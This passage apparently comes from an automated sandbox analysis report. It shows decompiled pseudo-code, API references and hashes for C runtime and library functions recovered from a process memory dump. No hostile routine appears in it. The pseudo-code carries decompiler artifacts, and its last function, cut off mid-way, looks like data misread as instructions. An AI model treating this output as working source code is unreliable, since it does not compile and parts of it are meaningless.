                    • API String ID: 431132790-81113173
                    • Opcode ID: c441ef7139a0621de4cb4639baf8c90f745f622baf39a3c0a0b489924ee7889f
                    • Instruction ID: 85fa0d52a2439fe24c48f597e04e7563d1217aac1a0769573b4d854fb1bdd5d1
                    • Opcode Fuzzy Hash: c441ef7139a0621de4cb4639baf8c90f745f622baf39a3c0a0b489924ee7889f
                    • Instruction Fuzzy Hash: AD11397094025AEADB10F7A9CC1AEEE7B38EF21B15F50400EE500B7296CAB14A44C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 40%
                    			E013C6548(void* __ecx, void* __edx, signed int _a4, char _a8) {
                    				char _v24;
                    				signed int _t15;
                    				signed int _t17;
                    				signed int _t18;
                    				void* _t21;
                    				signed char _t26;
                    				void* _t31;
                    				void* _t35;
                    				signed char _t38;
                    
                    				_t31 = __edx;
                    				_t15 = _a4 & 0x00000017;
                    				 *(__ecx + 0xc) = _t15;
                    				_t26 =  *(__ecx + 0x10) & _t15;
                    				if(_t26 == 0) {
                    					return _t15;
                    				} else {
                    					if(_a8 != 0) {
                    						_push(0);
                    						_push(0);
                    					} else {
                    						_t48 = _t26 & 0x00000004;
                    						if((_t26 & 0x00000004) == 0) {
                    							__eflags = _t26 & 0x00000002;
                    							if((_t26 & 0x00000002) == 0) {
                    								_t21 = E013C2243();
                    								_push("ios_base::eofbit set");
                    							} else {
                    								_t21 = E013C2243();
                    								_push("ios_base::failbit set");
                    							}
                    						} else {
                    							_t21 = E013C2243();
                    							_push("ios_base::badbit set");
                    						}
                    						_push(_t21);
                    						_push(1);
                    						_t26 =  &_v24;
                    						E013C387D(_t26, _t48);
                    						_push(0x1430a04);
                    						_v24 = 0x141a920;
                    						_push( &_v24);
                    					}
                    					E013F4EC6();
                    					asm("int3");
                    					_t38 = _t26;
                    					if( *((intOrPtr*)(_t38 + 0x4c)) != 0) {
                    						_t17 = E013C5A78(_t26, _t31);
                    						_push( *((intOrPtr*)(_t38 + 0x4c)));
                    						__eflags = _t17;
                    						_t34 =  ==  ? 0 : _t38; // executed
                    						_t18 = E013FDD5A(0); // executed
                    						__eflags = _t18;
                    						_t35 =  !=  ? 0 :  ==  ? 0 : _t38;
                    					} else {
                    						_t35 = 0;
                    					}
                    					E013C5CF0(_t38, 0, 2);
                    					return _t35;
                    				}
                    			}













                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C65B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 0a921913b74e97e25ed40fd4344fe694e8de180f504a7ffc0f75c23d8c974c82
                    • Instruction ID: 0bf5c31c33b02a71e81e075f61cd0645da7dc85d9c449174883c8354866526ee
                    • Opcode Fuzzy Hash: 0a921913b74e97e25ed40fd4344fe694e8de180f504a7ffc0f75c23d8c974c82
                    • Instruction Fuzzy Hash: 01F0FCF095430DAADB10FA5CC903F7E37A55F30E1CF34440DA70166665EA716E84C762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E013C4DE1(void* __ecx) {
                    				void* _t20;
                    				void* _t26;
                    
                    				_t20 = __ecx;
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				_push(_t20 + 0xc);
                    				_push(0x1435fe0);
                    				_push("OutputStringPointer");
                    				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 8)))) + 4))() == 0) {
                    					E013C2AD0(_t26 - 0x24, "StringSink: OutputStringPointer not specified");
                    					 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                    					_push(_t26 - 0x24);
                    					_push(1);
                    					E013C2E51(_t26 - 0x4c);
                    					 *((intOrPtr*)(_t26 - 0x4c)) = 0x141a97c;
                    					_t14 = E013F4EC6(_t26 - 0x4c, 0x1430adc);
                    				}
                    				return E013F269C(_t14);
                    			}






                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C4DE8
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C4E38
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • OutputStringPointer, xrefs: 013C4DF9
                    • StringSink: OutputStringPointer not specified, xrefs: 013C4E09
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$ExceptionException@8RaiseThrow
                    • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                    • API String ID: 1412866469-1331214609
                    • Opcode ID: 91dbacd041d566472c4ba37d2b5e994ea34d33f523b33f69c25b30e543b7eee1
                    • Instruction ID: 4376ba358ae4e09fb821611c4f07b344e0d9044c6e01eeb65cec214ca9cb75ab
                    • Opcode Fuzzy Hash: 91dbacd041d566472c4ba37d2b5e994ea34d33f523b33f69c25b30e543b7eee1
                    • Instruction Fuzzy Hash: CBF0B475A402099FCB00FBA5C851FEFB378EF64B18F50841DA60477150CBB09D06CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0140A947(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				unsigned int _v20;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				char _v40;
                    				intOrPtr _v48;
                    				char _v52;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t86;
                    				signed int _t92;
                    				signed int _t93;
                    				signed int _t94;
                    				signed int _t100;
                    				void* _t101;
                    				void* _t102;
                    				void* _t104;
                    				void* _t107;
                    				void* _t109;
                    				void* _t111;
                    				void* _t115;
                    				char* _t116;
                    				void* _t119;
                    				signed int _t121;
                    				signed int _t128;
                    				signed int* _t129;
                    				signed int _t136;
                    				signed int _t137;
                    				char _t138;
                    				signed int _t139;
                    				signed int _t142;
                    				signed int _t146;
                    				signed int _t151;
                    				char _t156;
                    				char _t157;
                    				void* _t161;
                    				unsigned int _t162;
                    				signed int _t164;
                    				signed int _t166;
                    				signed int _t170;
                    				void* _t171;
                    				signed int* _t172;
                    				signed int _t174;
                    				signed int _t181;
                    				signed int _t182;
                    				signed int _t183;
                    				signed int _t184;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    
                    				_t171 = __edx;
                    				_t181 = _a24;
                    				if(_t181 < 0) {
                    					_t181 = 0;
                    				}
                    				_t184 = _a8;
                    				 *_t184 = 0;
                    				E013FEF21(0,  &_v52, _t171, _a36);
                    				_t5 = _t181 + 0xb; // 0xb
                    				if(_a12 > _t5) {
                    					_t172 = _a4;
                    					_t142 = _t172[1];
                    					_v36 =  *_t172;
                    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                    						L11:
                    						__eflags = _t142 & 0x80000000;
                    						if((_t142 & 0x80000000) != 0) {
                    							 *_t184 = 0x2d;
                    							_t184 = _t184 + 1;
                    							__eflags = _t184;
                    						}
                    						__eflags = _a28;
                    						_v16 = 0x3ff;
                    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                    						__eflags = _t172[1] & 0x7ff00000;
                    						_v32 = _t136;
                    						_t86 = 0x30;
                    						if((_t172[1] & 0x7ff00000) != 0) {
                    							 *_t184 = 0x31;
                    							_t185 = _t184 + 1;
                    							__eflags = _t185;
                    						} else {
                    							 *_t184 = _t86;
                    							_t185 = _t184 + 1;
                    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                    							__eflags = _t164;
                    							if(_t164 != 0) {
                    								_v16 = 0x3fe;
                    							} else {
                    								_v16 = _v16 & _t164;
                    							}
                    						}
                    						_t146 = _t185;
                    						_t186 = _t185 + 1;
                    						_v28 = _t146;
                    						__eflags = _t181;
                    						if(_t181 != 0) {
                    							_t30 = _v48 + 0x88; // 0xffce8305
                    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                    						} else {
                    							 *_t146 = 0;
                    						}
                    						_t92 = _t172[1] & 0x000fffff;
                    						__eflags = _t92;
                    						_v20 = _t92;
                    						if(_t92 > 0) {
                    							L23:
                    							_t33 =  &_v8;
                    							 *_t33 = _v8 & 0x00000000;
                    							__eflags =  *_t33;
                    							_t147 = 0xf0000;
                    							_t93 = 0x30;
                    							_v12 = _t93;
                    							_v20 = 0xf0000;
                    							do {
                    								__eflags = _t181;
                    								if(_t181 <= 0) {
                    									break;
                    								}
                    								_t119 = E013F3290( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    								_t161 = 0x30;
                    								_t121 = _t119 + _t161 & 0x0000ffff;
                    								__eflags = _t121 - 0x39;
                    								if(_t121 > 0x39) {
                    									_t121 = _t121 + _t136;
                    									__eflags = _t121;
                    								}
                    								_t162 = _v20;
                    								_t172 = _a4;
                    								 *_t186 = _t121;
                    								_t186 = _t186 + 1;
                    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                    								_t147 = _t162 >> 4;
                    								_t93 = _v12 - 4;
                    								_t181 = _t181 - 1;
                    								_v20 = _t162 >> 4;
                    								_v12 = _t93;
                    								__eflags = _t93;
                    							} while (_t93 >= 0);
                    							__eflags = _t93;
                    							if(_t93 < 0) {
                    								goto L39;
                    							}
                    							_t115 = E013F3290( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                    							__eflags = _t115 - 8;
                    							if(_t115 <= 8) {
                    								goto L39;
                    							}
                    							_t54 = _t186 - 1; // 0x13fcad8
                    							_t116 = _t54;
                    							_t138 = 0x30;
                    							while(1) {
                    								_t156 =  *_t116;
                    								__eflags = _t156 - 0x66;
                    								if(_t156 == 0x66) {
                    									goto L33;
                    								}
                    								__eflags = _t156 - 0x46;
                    								if(_t156 != 0x46) {
                    									_t139 = _v32;
                    									__eflags = _t116 - _v28;
                    									if(_t116 == _v28) {
                    										_t57 = _t116 - 1;
                    										 *_t57 =  *(_t116 - 1) + 1;
                    										__eflags =  *_t57;
                    									} else {
                    										_t157 =  *_t116;
                    										__eflags = _t157 - 0x39;
                    										if(_t157 != 0x39) {
                    											 *_t116 = _t157 + 1;
                    										} else {
                    											 *_t116 = _t139 + 0x3a;
                    										}
                    									}
                    									goto L39;
                    								}
                    								L33:
                    								 *_t116 = _t138;
                    								_t116 = _t116 - 1;
                    							}
                    						} else {
                    							__eflags =  *_t172;
                    							if( *_t172 <= 0) {
                    								L39:
                    								__eflags = _t181;
                    								if(_t181 > 0) {
                    									_push(_t181);
                    									_t111 = 0x30;
                    									_push(_t111);
                    									_push(_t186);
                    									E013F5890(_t181);
                    									_t186 = _t186 + _t181;
                    									__eflags = _t186;
                    								}
                    								_t94 = _v28;
                    								__eflags =  *_t94;
                    								if( *_t94 == 0) {
                    									_t186 = _t94;
                    								}
                    								__eflags = _a28;
                    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								_t174 = _a4[1];
                    								_t100 = E013F3290( *_a4, 0x34, _t174);
                    								_t137 = 0;
                    								_t151 = (_t100 & 0x000007ff) - _v16;
                    								__eflags = _t151;
                    								asm("sbb ebx, ebx");
                    								if(__eflags < 0) {
                    									L47:
                    									 *(_t186 + 1) = 0x2d;
                    									_t187 = _t186 + 2;
                    									__eflags = _t187;
                    									_t151 =  ~_t151;
                    									asm("adc ebx, 0x0");
                    									_t137 =  ~_t137;
                    									goto L48;
                    								} else {
                    									if(__eflags > 0) {
                    										L46:
                    										 *(_t186 + 1) = 0x2b;
                    										_t187 = _t186 + 2;
                    										L48:
                    										_t182 = _t187;
                    										_t101 = 0x30;
                    										 *_t187 = _t101;
                    										__eflags = _t137;
                    										if(__eflags < 0) {
                    											L56:
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L60:
                    												_push(0);
                    												_push(0xa);
                    												_push(_t137);
                    												_push(_t151);
                    												_t102 = E01415060();
                    												_v32 = _t174;
                    												 *_t187 = _t102 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												L61:
                    												_t104 = 0x30;
                    												_t183 = 0;
                    												__eflags = 0;
                    												 *_t187 = _t151 + _t104;
                    												 *(_t187 + 1) = 0;
                    												goto L62;
                    											}
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L61;
                    											}
                    											if(__eflags > 0) {
                    												goto L60;
                    											}
                    											__eflags = _t151 - 0xa;
                    											if(_t151 < 0xa) {
                    												goto L61;
                    											}
                    											goto L60;
                    										}
                    										if(__eflags > 0) {
                    											L51:
                    											_push(0);
                    											_push(0x3e8);
                    											_push(_t137);
                    											_push(_t151);
                    											_t107 = E01415060();
                    											_v32 = _t174;
                    											 *_t187 = _t107 + 0x30;
                    											_t187 = _t187 + 1;
                    											__eflags = _t187 - _t182;
                    											if(_t187 != _t182) {
                    												L55:
                    												_push(0);
                    												_push(0x64);
                    												_push(_t137);
                    												_push(_t151);
                    												_t109 = E01415060();
                    												_v32 = _t174;
                    												 *_t187 = _t109 + 0x30;
                    												_t187 = _t187 + 1;
                    												__eflags = _t187;
                    												goto L56;
                    											}
                    											L52:
                    											__eflags = _t137;
                    											if(__eflags < 0) {
                    												goto L56;
                    											}
                    											if(__eflags > 0) {
                    												goto L55;
                    											}
                    											__eflags = _t151 - 0x64;
                    											if(_t151 < 0x64) {
                    												goto L56;
                    											}
                    											goto L55;
                    										}
                    										__eflags = _t151 - 0x3e8;
                    										if(_t151 < 0x3e8) {
                    											goto L52;
                    										}
                    										goto L51;
                    									}
                    									__eflags = _t151;
                    									if(_t151 < 0) {
                    										goto L47;
                    									}
                    									goto L46;
                    								}
                    							}
                    							goto L23;
                    						}
                    					}
                    					__eflags = 0;
                    					if(0 != 0) {
                    						goto L11;
                    					} else {
                    						_t183 = E0140AC4A(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                    						__eflags = _t183;
                    						if(_t183 == 0) {
                    							_t128 = E013F59F0(_t184, 0x65);
                    							_pop(_t166);
                    							__eflags = _t128;
                    							if(_t128 != 0) {
                    								__eflags = _a28;
                    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                    								__eflags = _t170;
                    								 *_t128 = _t170;
                    								 *((char*)(_t128 + 3)) = 0;
                    							}
                    							_t183 = 0;
                    						} else {
                    							 *_t184 = 0;
                    						}
                    						goto L62;
                    					}
                    				} else {
                    					_t129 = E013FDB3A();
                    					_t183 = 0x22;
                    					 *_t129 = _t183;
                    					E013FDA61();
                    					L62:
                    					if(_v40 != 0) {
                    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                    					}
                    					return _t183;
                    				}
                    			}
























































                    0x0140abcc
                    0x0140ab9d
                    0x0140ab9f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140ab9f
                    0x0140ab99
                    0x00000000
                    0x0140aa83
                    0x0140aa7e
                    0x0140a9a5
                    0x0140a9a7
                    0x00000000
                    0x0140a9a9
                    0x0140a9bf
                    0x0140a9c4
                    0x0140a9c6
                    0x0140a9d2
                    0x0140a9d8
                    0x0140a9d9
                    0x0140a9db
                    0x0140a9dd
                    0x0140a9e8
                    0x0140a9e8
                    0x0140a9eb
                    0x0140a9ed
                    0x0140a9ed
                    0x0140a9f0
                    0x0140a9c8
                    0x0140a9c8
                    0x0140a9c8
                    0x00000000
                    0x0140a9c6
                    0x0140a975
                    0x0140a975
                    0x0140a97c
                    0x0140a97d
                    0x0140a97f
                    0x0140ac31
                    0x0140ac35
                    0x0140ac3a
                    0x0140ac3a
                    0x0140ac49
                    0x0140ac49

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 91b9d6a16835b6585cd0a3a2808c0cb2a76c79bd5e3c41219ca0544d7f7ba4fa
                    • Instruction ID: 24373014128119aaaa2643f59ff4258f00e6c680c48c181c7efc99a10e8ebe98
                    • Opcode Fuzzy Hash: 91b9d6a16835b6585cd0a3a2808c0cb2a76c79bd5e3c41219ca0544d7f7ba4fa
                    • Instruction Fuzzy Hash: F3A14772A047469FE727CF6AC8907AEBFA5EF61310F28457ED6859B3E1C2388941C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E014143C1(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                    				int _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _t16;
                    				signed int _t17;
                    				int _t20;
                    				signed int _t21;
                    				int _t23;
                    				signed int _t25;
                    				int _t28;
                    				intOrPtr* _t30;
                    				int _t34;
                    				int _t35;
                    				void* _t36;
                    				intOrPtr* _t37;
                    				intOrPtr* _t38;
                    				int _t46;
                    				void* _t54;
                    				void* _t56;
                    				signed int _t58;
                    				int _t61;
                    				int _t63;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t58 = __edx;
                    				_t59 = _a4;
                    				_t61 = 0;
                    				_t16 = E01408E19(_a4, 0, 0, 1);
                    				_v20 = _t16;
                    				_v16 = __edx;
                    				_t65 = _t64 + 0x10;
                    				if((_t16 & __edx) != 0xffffffff) {
                    					_t17 = E01408E19(_t59, 0, 0, 2);
                    					_t66 = _t65 + 0x10;
                    					_t51 = _t17 & __edx;
                    					__eflags = (_t17 & __edx) - 0xffffffff;
                    					if((_t17 & __edx) == 0xffffffff) {
                    						goto L1;
                    					}
                    					_t46 = _a8 - _t17;
                    					__eflags = _t46;
                    					_t20 = _a12;
                    					asm("sbb eax, edx");
                    					_v8 = _t20;
                    					if(__eflags < 0) {
                    						L24:
                    						__eflags = _t20 - _t61;
                    						if(__eflags > 0) {
                    							L19:
                    							_t21 = E01408E19(_t59, _v20, _v16, _t61);
                    							__eflags = (_t21 & _t58) - 0xffffffff;
                    							if((_t21 & _t58) != 0xffffffff) {
                    								_t23 = 0;
                    								__eflags = 0;
                    								L31:
                    								return _t23;
                    							}
                    							L20:
                    							_t23 =  *((intOrPtr*)(E013FDB3A()));
                    							goto L31;
                    						}
                    						if(__eflags < 0) {
                    							L27:
                    							_t25 = E01408E19(_t59, _a8, _a12, _t61);
                    							_t66 = _t66 + 0x10;
                    							__eflags = (_t25 & _t58) - 0xffffffff;
                    							if((_t25 & _t58) == 0xffffffff) {
                    								goto L20;
                    							}
                    							_t28 = SetEndOfFile(E0140DD90(_t59));
                    							__eflags = _t28;
                    							if(_t28 != 0) {
                    								goto L19;
                    							}
                    							 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    							_t30 = E013FDB27();
                    							 *_t30 = GetLastError();
                    							goto L20;
                    						}
                    						__eflags = _t46 - _t61;
                    						if(_t46 >= _t61) {
                    							goto L19;
                    						}
                    						goto L27;
                    					}
                    					if(__eflags > 0) {
                    						L6:
                    						_t63 = E014009B2(_t51, 0x1000, 1);
                    						_pop(_t54);
                    						__eflags = _t63;
                    						if(_t63 != 0) {
                    							_v12 = E01404945(_t54, _t59, 0x8000);
                    							_t34 = _v8;
                    							_pop(_t56);
                    							do {
                    								__eflags = _t34;
                    								if(__eflags < 0) {
                    									L13:
                    									_t35 = _t46;
                    									L14:
                    									_t36 = E014081B5(_t59, _t63, _t35);
                    									_t66 = _t66 + 0xc;
                    									__eflags = _t36 - 0xffffffff;
                    									if(_t36 == 0xffffffff) {
                    										_t37 = E013FDB27();
                    										__eflags =  *_t37 - 5;
                    										if( *_t37 == 5) {
                    											 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    										}
                    										L23:
                    										_t38 = E013FDB3A();
                    										E014012E1(_t63);
                    										_t23 =  *_t38;
                    										goto L31;
                    									}
                    									asm("cdq");
                    									_t46 = _t46 - _t36;
                    									_t34 = _v8;
                    									asm("sbb eax, edx");
                    									_v8 = _t34;
                    									__eflags = _t34;
                    									if(__eflags > 0) {
                    										L12:
                    										_t35 = 0x1000;
                    										goto L14;
                    									}
                    									if(__eflags < 0) {
                    										break;
                    									}
                    									goto L17;
                    								}
                    								if(__eflags > 0) {
                    									goto L12;
                    								}
                    								__eflags = _t46 - 0x1000;
                    								if(_t46 < 0x1000) {
                    									goto L13;
                    								}
                    								goto L12;
                    								L17:
                    								__eflags = _t46;
                    							} while (_t46 != 0);
                    							E01404945(_t56, _t59, _v12);
                    							E014012E1(_t63);
                    							_t66 = _t66 + 0xc;
                    							_t61 = 0;
                    							__eflags = 0;
                    							goto L19;
                    						}
                    						 *((intOrPtr*)(E013FDB3A())) = 0xc;
                    						goto L23;
                    					}
                    					__eflags = _t46;
                    					if(_t46 <= 0) {
                    						goto L24;
                    					}
                    					goto L6;
                    				}
                    				L1:
                    				return  *((intOrPtr*)(E013FDB3A()));
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 8bbfb8f7512e503b858e82fa0a4d848c6e57d9fafed7adaad3264f39a46bfe8c
                    • Instruction ID: 395b15c0f07cf018086d05d17c70ce65e75e52d50487f9c3923788dbcac3d961
                    • Opcode Fuzzy Hash: 8bbfb8f7512e503b858e82fa0a4d848c6e57d9fafed7adaad3264f39a46bfe8c
                    • Instruction Fuzzy Hash: FC410871A401166BDB226EFE8C44A6F3AA4EF61374F1C423BF614D72B8D774894242A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E01409CD8(void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* _v40;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t34;
                    				signed int _t40;
                    				int _t46;
                    				int _t53;
                    				void* _t54;
                    				void* _t55;
                    				int _t57;
                    				signed int _t63;
                    				void* _t65;
                    				int _t66;
                    				short* _t67;
                    				signed int _t68;
                    				short* _t69;
                    
                    				_t34 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t34 ^ _t68;
                    				E013FEF21(_t54,  &_v28, _t65, _a4);
                    				_t57 = _a24;
                    				if(_t57 == 0) {
                    					_t53 =  *(_v24 + 8);
                    					_t57 = _t53;
                    					_a24 = _t53;
                    				}
                    				_t66 = 0;
                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                    				_v12 = _t40;
                    				if(_t40 == 0) {
                    					L15:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return E013F268B(_t66, _v8 ^ _t68);
                    				}
                    				_t55 = _t40 + _t40;
                    				_t17 = _t55 + 8; // 0x8
                    				asm("sbb eax, eax");
                    				if((_t17 & _t40) == 0) {
                    					_t67 = 0;
                    					L11:
                    					if(_t67 != 0) {
                    						E013F5890(_t66, _t67, _t66, _t55);
                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
                    						if(_t46 != 0) {
                    							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
                    						}
                    					}
                    					L14:
                    					E013F1B60(_t67);
                    					goto L15;
                    				}
                    				_t20 = _t55 + 8; // 0x8
                    				asm("sbb eax, eax");
                    				_t48 = _t40 & _t20;
                    				_t21 = _t55 + 8; // 0x8
                    				_t63 = _t21;
                    				if((_t40 & _t20) > 0x400) {
                    					asm("sbb eax, eax");
                    					_t67 = E0140131B(_t63, _t48 & _t63);
                    					if(_t67 == 0) {
                    						goto L14;
                    					}
                    					 *_t67 = 0xdddd;
                    					L9:
                    					_t67 =  &(_t67[4]);
                    					goto L11;
                    				}
                    				asm("sbb eax, eax");
                    				E013F2CE0();
                    				_t67 = _t69;
                    				if(_t67 == 0) {
                    					goto L14;
                    				}
                    				 *_t67 = 0xcccc;
                    				goto L9;
                    			}

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001,00000000,?,00000001,00000000,00000000), ref: 01409D25
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 01409DAE
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 01409DC0
                    • __freea.LIBCMT ref: 01409DC9
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                    • String ID:
                    • API String ID: 573072132-0
                    • Opcode ID: 89461c60a69d29eb4544dce71a72f401fc55409cbfb347bf09c178f254170aa5
                    • Instruction ID: acafbf2fe92e84b3287b2225a37af0954d356d1295f60978a72526be5f44ce8b
                    • Opcode Fuzzy Hash: 89461c60a69d29eb4544dce71a72f401fc55409cbfb347bf09c178f254170aa5
                    • Instruction Fuzzy Hash: E931D072A1020AABEF269F69DC44EEF7BA5EF40718B050139ED08D72A1E735D951CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E013F77A4(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, signed int __esi) {
                    				signed int _t41;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				void* _t51;
                    				void* _t52;
                    				signed int _t55;
                    				void* _t56;
                    				void* _t57;
                    
                    				_t54 = __esi;
                    				_t52 = __edi;
                    				_t50 = __edx;
                    				_t49 = __ecx;
                    				_t48 = __ebx;
                    				_t41 = 0x69;
                    				asm("aas");
                    				_t57 = _t56 + __ecx;
                    				asm("insd");
                    				asm("aas");
                    				 *__ecx =  *__ecx + __edx;
                    				if( *__ecx < 0) {
                    					L4:
                    					asm("aas");
                    					_t51 = _t50 + _t55;
                    					if(_t51 >= 0) {
